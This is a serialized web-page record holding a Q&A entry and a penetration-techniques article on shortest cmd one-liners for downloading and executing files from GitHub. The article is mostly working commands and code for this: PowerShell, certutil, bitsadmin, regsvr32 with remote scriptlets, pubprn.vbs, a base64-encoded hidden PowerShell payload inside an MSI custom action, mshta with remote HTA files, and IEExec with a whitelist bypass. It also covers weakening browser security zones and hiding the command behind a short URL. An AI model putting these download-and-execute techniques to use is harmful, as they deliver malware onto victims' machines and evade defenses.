[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjffgmSJ_nkI-e-7K8EGuidlA9BforalnuefugFOOMwU":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},571,"How can regsvr32 be abused to download and execute files from GitHub?","Regsvr32 can load a remotely hosted scriptlet (.sct) file that contains VBScript or JScript code. For example, using `regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.com\u002F...\u002Fdownloadexec.sct scrobj.dll` prompts regsvr32 to execute the script, which then calls PowerShell or VBScript to download and run the payload. This technique avoids touching disk with the initial payload and is part of the methods detailed in [Penetration Techniques - Multiple Methods for Downloading Files from GitHub](\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github). Similar parameter-hiding approaches are explored in [Penetration Techniques - Parameter Hiding Techniques in Shortcut Files](\u002Fnews\u002Fpenetration-techniques-parameter-hiding-techniques-in-shortcut-files).","\u003Cp>Regsvr32 can load a remotely hosted scriptlet (.sct) file that contains VBScript or JScript code. For example, using `regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.com\u002F...\u002Fdownloadexec.sct scrobj.dll` prompts regsvr32 to execute the script, which then calls PowerShell or VBScript to download and run the payload. This technique avoids touching disk with the initial payload and is part of the methods detailed in [Penetration Techniques - Multiple Methods for Downloading Files from GitHub](\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github). Similar parameter-hiding approaches are explored in [Penetration Techniques - Parameter Hiding Techniques in Shortcut Files](\u002Fnews\u002Fpenetration-techniques-parameter-hiding-techniques-in-shortcut-files).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-regsvr32-be-abused-to-download-and-execute-files-from-github-1777483007700","regsvr32, scriptlet, .sct, JScript, VBScript, code execution, download file",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},140,"Penetration Techniques - Multiple Methods for Downloading Files from GitHub","penetration-techniques-multiple-methods-for-downloading-files-from-github","Explore multiple methods to download and execute files from GitHub via cmd, including PowerShell, certutil, bitsadmin, and regsvr32 techniques.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article originates from an interesting question:\u003C\u002Fp>\u003Cp>Given an exe file: an open-source project\u003C\u002Fp>\u003Cp>Windows environment, requiring the exe to be released to a specified directory and executed, e.g., c:\\download\u003C\u002Fp>\u003Cp>\u003Cstrong>Question:\u003C\u002Fstrong>What is the shortest code in characters to achieve this via cmd?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Summary of methods for downloading files from GitHub via cmd\u003C\u002Fli>\u003Cli>Selecting the implementation method with the shortest code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled 'Penetration Techniques - Various Methods of Uploading Files via cmd', a summary of methods for downloading files via the command line was provided.\u003C\u002Fp>\u003Cp>Since GitHub supports the HTTPS protocol but not the HTTP protocol, certain issues need to be considered when utilizing these methods, as some do not support the HTTP protocol.\u003C\u002Fp>\u003Ch2>0x03 Summary of Available Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>powershell (new-object System.Net.WebClient).DownloadFile('some open-source project');start-process 'c:\\download\\a.exe'\u003C\u002Fp>\u003Ch3>2. certutil\u003C\u002Fh3>\u003Cp>certutil -urlcache -split -f some open-source project c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\u003C\u002Fp>\u003Ch3>3. bitsadmin\u003C\u002Fh3>\u003Cp>bitsadmin \u002Ftransfer n some open-source project c:\\download\\a.exe &amp;&amp; c:\\download\\a.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The download speed using bitsadmin is relatively slow.\u003C\u002Fp>\u003Ch3>4. regsvr32\u003C\u002Fh3>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>The code for JScript invoking PowerShell to achieve download and execution is:\u003C\u002Fp>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"powershell (new-object System.Net.WebClient).DownloadFile('some open-source project);start-process 'c:\\\\download\\\\a.exe'\",0,true);\u003C\u002Fp>\u003Cp>Refer to the sct file format:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.some open-source project.sct\u003C\u002Fp>\u003Cp>Add functionality to generate downloadexec.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Implement functionality:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>Of course, to reduce the number of invoked programs, the following approach can also be used:\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Typically, the download and execution code implemented by vbs script is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.XMLHTTP\")\u003Cbr>http.open \"GET\",\"http:\u002F\u002F192.168.81.192\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, this script does not support HTTPS downloads; Msxml2.ServerXMLHTTP.6.0 can be used instead\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.ServerXMLHTTP.6.0\")\u003Cbr>http.SetOption 2, 13056\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This approach originates from @mosin @SomaliPirate\u003C\u002Fp>\u003Cp>It can also be implemented using WinHttp.WinHttpRequest.5.1, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\")\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from @ogre\u003C\u002Fp>\u003Cp>VBS script implementation of execution code\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WScript.CreateObject(\"WScript.Shell\").Run \"c:\\download\\a.exe\",0,true \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Still using the sct file as a template, adding functionality to generate downloadexec2.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Ch3>5、pubprn.vbs\u003C\u002Fh3>\u003Cp>Using pubprn.vbs enables execution of sct files on remote servers (sct file formats may differ)\u003C\u002Fp>\u003Cp>\u003Cstrong>Approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Code has been uploaded, address: https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cscript \u002Fb C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>Alternatively, the following approach can be used (code omitted):\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Ch3>6、msiexec\u003C\u002Fh3>\u003Cp>This method was previously introduced in my two articles 'msiexec in Penetration Testing' and 'Penetration Techniques - Switching from Admin to System Privileges', details omitted here\u003C\u002Fp>\u003Cp>First encode the PowerShell download-and-execute code in base64:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"(new-object System.Net.WebClient).DownloadFile('https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\"\u003Cbr>$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes);\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result:\u003C\u002Fp>\u003Cp>KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete PowerShell command is:\u003C\u002Fp>\u003Cp>powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete WIX file is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003Cwix xmlns=\"http:\u002F\u002Fschemas.microsoft.com\u002Fwix\u002F2006\u002Fwi\">\u003Cbr>  \u003Cproduct id=\"*\" upgradecode=\"12345678-1234-1234-1234-111111111111\" name=\"Example Product \u003Cbr>Name\" version=\"0.0.1\" manufacturer=\"@_xpn_\" language=\"1033\">\u003Cbr>    \u003Cpackage installerversion=\"200\" compressed=\"yes\" comments=\"Windows Installer Package\">\u003Cbr>    \u003Cmedia id=\"1\">\u003Cbr>\u003Cbr>    \u003Cdirectory id=\"TARGETDIR\" name=\"SourceDir\">\u003Cbr>      \u003Cdirectory id=\"ProgramFilesFolder\">\u003Cbr>        \u003Cdirectory id=\"INSTALLLOCATION\" name=\"Example\">\u003Cbr>          \u003Ccomponent id=\"ApplicationFiles\" guid=\"12345678-1234-1234-1234-222222222222\">     \u003Cbr>          \u003C\u002Fcomponent>\u003Cbr>        \u003C\u002Fdirectory>\u003Cbr>      \u003C\u002Fdirectory>\u003Cbr>    \u003C\u002Fdirectory>\u003Cbr>\u003Cbr>    \u003Cfeature id=\"DefaultFeature\" level=\"1\">\u003Cbr>      \u003Ccomponentref id=\"ApplicationFiles\">\u003Cbr>    \u003C\u002Fcomponentref>\u003C\u002Ffeature>\u003Cbr>\u003Cbr>    \u003Cproperty id=\"cmdline\">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003Cbr>    \u003C\u002Fproperty>\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"SystemShell\" execute=\"deferred\" directory=\"TARGETDIR\" \u003Cbr=\"\">ExeCommand='[cmdline]' Return=\"ignore\" Impersonate=\"no\"\u002F&gt;\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"FailInstall\" execute=\"deferred\" script=\"vbscript\" return=\"check\">\u003Cbr>      invalid vbs to fail install\u003Cbr>    \u003C\u002Fcustomaction>\u003Cbr>\u003Cbr>    \u003Cinstallexecutesequence>\u003Cbr>      \u003Ccustom action=\"SystemShell\" after=\"InstallInitialize\">\u003C\u002Fcustom>\u003Cbr>      \u003Ccustom action=\"FailInstall\" before=\"InstallFiles\">\u003C\u002Fcustom>\u003Cbr>    \u003C\u002Finstallexecutesequence>\u003Cbr>\u003Cbr>  \u003C\u002Fcustomaction>\u003C\u002Fmedia>\u003C\u002Fpackage>\u003C\u002Fproduct>\u003Cbr>\u003C\u002Fwix>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it to generate an msi file with the following commands:\u003C\u002Fp>\u003Cp>candle.exe msigen.wix\u003C\u002Fp>\u003Cp>light.exe msigen.wixobj\u003C\u002Fp>\u003Cp>Generate test.msi\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>`msiexec \u002Fq \u002Fi an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, manually terminate the process msiexec.exe\u003C\u002Fp>\u003Ch3>7、mshta\u003C\u002Fh3>\u003Cp>mshta supports http and https\u003C\u002Fp>\u003Cp>However, when mshta executes hta scripts, similar to a browser, it performs corresponding parsing operations based on the link's response headers, so it only runs when the response header is html\u003C\u002Fp>\u003Cp>Otherwise, it will be parsed as plain text\u003C\u002Fp>\u003Cp>For code on GitHub, the returned format is text\u002Fplain\u003C\u002Fp>\u003Cp>If executed with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>the code will be treated as text and cannot be parsed as html, causing the script to fail to execute\u003C\u002Fp>\u003Cp>But we can change our approach:\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, and it will be parsed as html, enabling code execution\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, with the address being https:\u002F\u002Fsome-open-source-project\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003Cp>Execute the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully launches the calculator\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from DM_\u003C\u002Fp>\u003Cp>Add functionality to achieve download and execution, with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A pop-up indicates that security settings on this computer prohibit accessing data sources from other domains, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017964712_0_01c0bcfe43.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IE browser - Internet Options - Security\u003C\u002Fp>\u003Cp>Select Trusted Sites, add the blog address: https:\u002F\u002Fanopensourceproject\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017968528_1_8fa66fe541.jpeg\">\u003C\u002Fp>\u003Cp>Custom Level, find 'Access data sources across domains', select Enable\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017975011_2_a7a31b2e8e.jpeg\">\u003C\u002Fp>\u003Cp>Test again, successfully achieving the download and execution functionality\u003C\u002Fp>\u003Cp>Through the above tests, we found that the IE browser by default blocks download functionality implemented via VBS scripts\u003C\u002Fp>\u003Cp>Therefore, we can boldly speculate that if download and execution are implemented using PowerShell instead, it will not be blocked\u003C\u002Fp>\u003Cp>Modify the script and upload it to GitHub\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec2.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After testing, this method is usable\u003C\u002Fp>\u003Cp>Use a short URL\u003C\u002Fp>\u003Cp>Interestingly, http:\u002F\u002Fdwz.cn\u002F does not support this domain\u003C\u002Fp>\u003Cp>Switch to another short URL website: http:\u002F\u002Fsina.lt\u002F\u003C\u002Fp>\u003Cp>Generate a short URL, the final command is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The final shortest character length achieved is 25\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. IEExec\u003C\u002Fh3>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\u003Cbr>caspol -s off\u003Cbr>IEExec http:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The exe must meet specific format requirements\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Froom362.com\u002Fpost\u002F2014\u002F2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>I failed to reproduce this on Windows 7\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes methods for downloading files from GitHub via cmd, with the shortest implementation being mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003Cp>The minimum character length achieved is 25\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article originates from an interesting question:\u003C\u002Fp>\u003Cp>Given an exe file: an open-source project\u003C\u002Fp>\u003Cp>Windows environment, requiring the exe to be released to a specified directory and executed, e.g., c:\\download\u003C\u002Fp>\u003Cp>\u003Cstrong>Question:\u003C\u002Fstrong>What is the shortest code in characters to achieve this via cmd?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Summary of methods for downloading files from GitHub via cmd\u003C\u002Fli>\u003Cli>Selecting the implementation method with the shortest code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled 'Penetration Techniques - Various Methods of Uploading Files via cmd', a summary of methods for downloading files via the command line was provided.\u003C\u002Fp>\u003Cp>Since GitHub supports the HTTPS protocol but not the HTTP protocol, certain issues need to be considered when utilizing these methods, as some do not support the HTTP protocol.\u003C\u002Fp>\u003Ch2>0x03 Summary of Available Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>powershell (new-object System.Net.WebClient).DownloadFile('some open-source project');start-process 'c:\\download\\a.exe'\u003C\u002Fp>\u003Ch3>2. certutil\u003C\u002Fh3>\u003Cp>certutil -urlcache -split -f some open-source project c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\u003C\u002Fp>\u003Ch3>3. bitsadmin\u003C\u002Fh3>\u003Cp>bitsadmin \u002Ftransfer n some open-source project c:\\download\\a.exe &amp;&amp; c:\\download\\a.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The download speed using bitsadmin is relatively slow.\u003C\u002Fp>\u003Ch3>4. regsvr32\u003C\u002Fh3>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>The code for JScript invoking PowerShell to achieve download and execution is:\u003C\u002Fp>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"powershell (new-object System.Net.WebClient).DownloadFile('some open-source project);start-process 'c:\\\\download\\\\a.exe'\",0,true);\u003C\u002Fp>\u003Cp>Refer to the sct file format:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.some open-source project.sct\u003C\u002Fp>\u003Cp>Add functionality to generate downloadexec.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Implement functionality:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>Of course, to reduce the number of invoked programs, the following approach can also be used:\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Typically, the download and execution code implemented by vbs script is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.XMLHTTP\")\u003Cbr>http.open \"GET\",\"http:\u002F\u002F192.168.81.192\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, this script does not support HTTPS downloads; Msxml2.ServerXMLHTTP.6.0 can be used instead\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.ServerXMLHTTP.6.0\")\u003Cbr>http.SetOption 2, 13056\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This approach originates from @mosin @SomaliPirate\u003C\u002Fp>\u003Cp>It can also be implemented using WinHttp.WinHttpRequest.5.1, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\")\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile 